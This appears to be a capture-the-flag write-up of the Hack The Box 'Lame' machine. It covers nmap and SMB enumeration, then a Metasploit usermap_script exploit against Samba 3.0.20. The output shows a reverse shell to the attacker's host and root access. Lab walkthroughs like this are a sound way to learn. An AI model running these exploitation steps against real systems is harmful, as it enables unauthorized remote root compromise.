Lets kick this off by using nmap to scan the target
nmap -A 10.10.10.3 |tee -a lame.txt
The -A flag sets the scan to agressive…not always the best choice, but I am in a bit of a mood!
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
1st try anonymous ftp login and enum.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> pwd
257 "/"
ftp> cd ..
2nd try smbclient and port 445 enum.
root@kali:~/HTB/prep/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
We can see that the target is running Samba 3.0.20-Debian, maybe it has some known
vulnerability we can find, but first lets take the hint and explore tmp
root@kali:~/HTB/prep/lame# smbclient //10.10.10.3/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 6 11:38:07 2019
.. DR 0 Sun May 20 20:36:12 2012
orbit-makis DR 0 Wed Nov 6 11:25:31 2019
.ICE-unix DH 0 Wed Nov 6 10:47:27 2019
.X11-unix DH 0 Wed Nov 6 10:47:51 2019
gconfd-makis DR 0 Wed Nov 6 11:25:31 2019
5141.jsvc_up R 0 Wed Nov 6 10:48:34 2019
.X0-lock HR 11 Wed Nov 6 10:47:51 2019
7282168 blocks of size 1024. 5678328 blocks available
smb: \>
Nothing immediately helpful here…so lets check Searchsploit for possible known exploits.
Searchsploit reveals a metasploit exploit for Samba 3.x Ok lets see how effective it is…
Start up msfconsole, then:
use exploit/multi/samba/usermap_script
use the command show options to see what info is required to make this work…
set rhosts 10.10.10.3
pull the trigger with exploit command…
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.31:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gcMvWCjjW9n0VrCc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gcMvWCjjW9n0VrCc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.31:4444 -> 10.10.10.3:54951) at 2020-01-21 11:42:12 -0500
id
uid=0(root) gid=0(root)
cd /home
ls
ftp
makis
service
user
cd makis
ls
user.txt
cat user.txt
69xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxc5
cat /root/root.txt
92xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdf
Oh, right….that was quick. I can see where the box gets its name from now; Nobody in their right mind should still be running this Samba version!
A good easy box for beginners to get to have a go at the basic tools, and methodology. Lets quickly move on to another box…
#######################
